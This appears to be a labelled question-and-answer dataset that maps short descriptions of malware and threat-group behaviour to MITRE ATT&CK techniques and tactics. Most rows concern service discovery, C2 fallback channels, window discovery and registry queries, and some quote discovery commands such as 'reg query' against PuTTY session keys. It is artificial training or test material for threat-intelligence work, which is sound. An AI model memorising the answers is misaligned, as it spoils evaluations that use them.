+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BitPaymer can enumerate existing Windows services on the host that are configured to run as LocalSystem.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Black Basta can check whether the service name FAX is present.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Caterpillar WebShell can obtain a list of the services from a system.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can enumerate services on compromised hosts.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Comnie runs the command: net start >> %TEMP%\info.dat on a victim.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba can query service status using QueryServiceStatusEx function.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla can retrieve information about a compromised system's running services.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dyre has the ability to identify running services on a compromised host.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elise executes net start after initial communication is made to the remote server.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emissary has the capability to execute the command net start to interact with services.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic uses the tasklist /svc command to list the services on the system.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GeminiDuke collects information on programs and services on the victim that are configured to automatically run at startup.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GravityRAT has a feature to list the available services on the system.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GreyEnergy enumerates all Windows services.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Heyoka Backdoor can check if it is running as a service on a compromised host.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant has the ability to retrieve a list of services on the infected host.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hydraq creates a backdoor through which remote attackers can monitor services.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HyperBro can list all services and their configurations.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can obtain running services on the victim.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ixeshe can list running services.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JPIN can list running services.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs collects a list of running services with the command tasklist /svc.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LookBack can enumerate services on the victim machine.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The net start command can be used in Net to find information about Windows services.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 can enumerate service and service permission information.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RATANKBA uses tasklist /svc to display running tasks.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can enumerate active services.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay can create and register a service for execution.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: S-Type runs the command net start on a victim.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can search for modifiable services that could be used for privilege escalation.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA has the capability to enumerate services.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST collected a list of service names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic has the ability to execute the `net start` command.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT can enumerate services on a victim machine.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sykipot may use net start to display running services.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SynAck enumerates all running services.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can collect a list of services on a victim machine.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tasklist can be used to discover services running on a system.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot collects a list of install programs and services on the system’s machine.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has gathered information about running services.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volgmer queries the system to identify existing services.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WINERACK can enumerate services.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZLib has the ability to discover and manipulate Windows services.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell can check the services on the system.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT can list local services.,"Tecnique: T1007 System Service Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors used company extranet servers as secondary C2 servers.","Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used the Steam community page as a fallback mechanism for C2.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7's Harpy backdoor malware can use DNS as a backup channel for C2 if HTTP fails.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware SierraAlfa sends data to one of the hard-coded C2 servers chosen at random, and if the transmission fails, chooses a new C2 server to attempt the transmission again.","Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig malware ISMAgent falls back to its DNS tunneling mechanism if it is unable to reach the C2 server over HTTP.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Anchor can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed can use a second channel for C2 when the primary channel is in upload mode.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BISCUIT malware contains a secondary fallback command and control server that is contacted after the primary command and control server.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar has the ability to use an alternative C2 server if the primary server fails.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackEnergy has the capability to communicate over a backup channel via plus.google.com.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can use backup C2 servers if the primary server fails.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CHOPSTICK can switch to a new C2 channel if the current one is broken.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT can communicate over multiple C2 host and port combinations.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower can change its C2 channel once every 360 loops by retrieving a new domain from the actors’ S3 bucket.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crutch has used a hardcoded GitHub repository as a fallback channel.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Derusbi uses a backup communication method with an HTTP beacon.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DustySky has two hard-coded domains for C2 servers; if the first does not respond, it will try the second.","Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury has implemented a fallback mechanism to begin using a DGA when the attacker hasn't connected to the infected system for three days.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Exaramel for Linux can attempt to find a new C2 server if it receives an error.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke has used several C2 servers per targeted organization.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can use multiple domains and protocols in C2.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOPLIGHT has multiple C2 channels in place in case one fails.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole has been configured with several servers available for alternate C2 communications.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JHUHUGIT tests if it can reach its C2 server by first attempting a direct connection, and if it fails, obtaining proxy settings and sending the connection through a proxy, and finally injecting code into a running browser if the proxy method fails.","Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar can accept multiple URLs for C2 servers.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kevin can assign hard-coded fallback domains for C2.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs uses a large list of C2 servers that it cycles through until a successful connection is established.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Linfo creates a backdoor through which remote attackers can change C2 servers.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete has sent data over HTTP if FTP failed, and has also used a fallback server.","Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MiniDuke uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mis-Type first attempts to use a Base64-encoded network protocol over a raw TCP socket for C2, and if that method fails, falls back to a secondary HTTP-based protocol to communicate to an alternate C2 server.","Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mythic can use a list of C2 URLs as fallback mechanisms in case one IP or domain gets blocked.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETEAGLE will attempt to detect if the infected host is configured to a proxy. If so, NETEAGLE will send beacons via an HTTP POST request; otherwise it will send beacons via UDP/6000.","Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon can switch to an alternate C2 domain when a particular date has been reached.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUADAGENT uses multiple protocols (HTTPS, HTTP, DNS) for its C2 server as fallback channels if communication with one is unsuccessful.","Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUIETEXIT can attempt to connect to a second hard-coded C2 if the first hard-coded C2 address fails.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT has used HTTP if DNS C2 communications were not functioning.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay has the ability to switch between TCP and HTTP for C2 if one method is not working.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: S-Type primarily uses port 80 for C2, but falls back to ports 443 or 8080 if initial communication fails.","Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shark can update its configuration to use a different C2 server.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat has used a secondary C2 location if the first was unavailable.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideTwist has primarily used port 443 for C2 but can use port 80 as a fallback.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SslMM has a hard-coded primary and backup C2 string.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet has the ability to generate new C2 domains.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TAINTEDSCRIBE can randomly pick one of five hard-coded IP addresses for C2 communication; if one of the IP fails, it will wait 60 seconds and then try another IP address.","Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyTurla can go through a list of C2 server IPs and will try to register with each until one responds.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can use up to 10 channels to communicate between implants.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak can communicate over multiple C2 hosts.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WinMM is usually configured with primary and backup domains for C2 communications.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The C2 server used by XTunnel provides a port number to the victim to use as a fallback in case the connection closes on the currently used port.,"Tecnique: T1008 Fallback Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has used a PowerShell-based keylogging tool to capture the window title.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process. The KilaAlfa keylogger also reports the title of the window in the foreground.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has the ability to identify the titles of running windows on a compromised host.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor can obtain application window titles and then determines which windows to perform Screen Capture on.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cadelspy has the ability to identify open windows on the compromised host.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Catchamas obtains application windows titles and then determines which windows to perform Screen Capture on.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate will search for cryptocurrency wallets by examining application window names for specific strings. DarkGate extracts information collected via NirSoft tools from the hosting process's memory by first identifying the window through the FindWindow API function.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman reports window names along with keylogger information to provide application context.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The discovery modules used with Duqu can collect information on open windows.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro can check the name of the window displayed on the system.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream has the ability to discover application windows via execution of `EnumWindows`.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can identify installed security tools based on window names.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant has the ability to list the names of all open windows on the infected host.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can enumerate windows and child windows on a compromised host.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar gathers information about opened windows.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete saves the window names.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo can enumerate all windows on the victim’s machine.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can discover and close windows on controlled systems.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NetTraveler reports window names along with keylogger information to provide application context.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub can use `GetForegroundWindow` to enumerate the active window.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLEAD has the ability to list open windows on the compromised host.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoisonIvy captures window titles.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerDuke has a command to get text of the current foreground window.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has the ability to enumerate windows on a compromised host.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can use the `GetForegroundWindow` and `GetWindowText` APIs to discover where the user is typing.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remexi has a command to capture active windows on the machine and retrieve window titles.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can enumerate the active Window during keylogging through execution of `GetActiveWindowTitle`.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SOUNDBITE is capable of enumerating application windows.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can monitor the titles of open windows to identify specific keywords.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WINERACK can enumerate active windows.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT gathers information about opened windows during the initial infection.,"Tecnique: T1010 Application Window Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flame has a module named BeetleJuice that contains Bluetooth functionality that may be used in different ways, including transmitting encoded information from the infected system over the Bluetooth protocol, acting as a Bluetooth beacon, and identifying other Bluetooth devices in the vicinity.","Tecnique: T1011.001 Exfiltration Over Other Network Medium: Exfiltration Over Bluetooth, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, the threat actors executed `/c cd /d c:\windows\temp\ & reg query HKEY_CURRENT_USER\Software\\PuTTY\Sessions\` to detect recent PuTTY sessions, likely to further lateral movement.","Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32's backdoor can query the Windows Registry to gather system information.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used various strains of malware to query the Registry.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 queried registry values to determine items such as configured RDP ports and network configurations.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has queried Registry keys using reg query \\\HKU\\SOFTWARE\Microsoft\Terminal Server Client\Servers and reg query \\\HKU\\Software\Microsoft\Windows\CurrentVersion\Internet Settings .,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has queried the Registry to identify victim information.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has accessed Registry hives ntuser.dat and UserClass.dat.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has obtained specific Registry keys and values on a compromised host.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware IndiaIndia checks Registry keys within HKCU and HKLM to determine if certain applications are present, including SecureCRT, Terminal Services, RealVNC, TightVNC, UltraVNC, Radmin, mRemote, TeamViewer, FileZilla, pcAnyware, and Remote Desktop. Another Lazarus Group malware sample checks for the presence of the following Registry key:HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt.","Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used reg query “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default” on a victim to query the Registry.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stealth Falcon malware attempts to determine the installed version of .NET by querying the Registry.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Threat Group-3390 tool can read and decrypt stored Registry values.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla surveys a system upon check-in to discover information in the Windows Registry with the reg query command. Turla has also retrieved PowerShell payloads hidden in Registry keys as well as checking keys associated with null session named pipes .,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has queried the Registry on compromised systems, `reg query hklm\software\`, for information on installed software.","Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has used a tool to query the Registry for proxy settings.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ADVSTORESHELL can enumerate registry keys.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor has opened the registry and performed query searches.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Azorult can check for installed software on the system under the Registry key Software\Microsoft\Windows\CurrentVersion\Uninstall.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BACKSPACE is capable of enumerating and making modifications to an infected system's Registry.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BabyShark has executed the reg query command for HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot searches for certain Registry keys to be configured before executing the payload.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can query Windows\CurrentVersion\Uninstall for installed applications.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BendyBear can query the host's Registry key at HKEY_CURRENT_USER\Console\QuickEdit to retrieve data.,"Tecnique: T1012 Query Registry, Tactic: TA0007 Discovery"
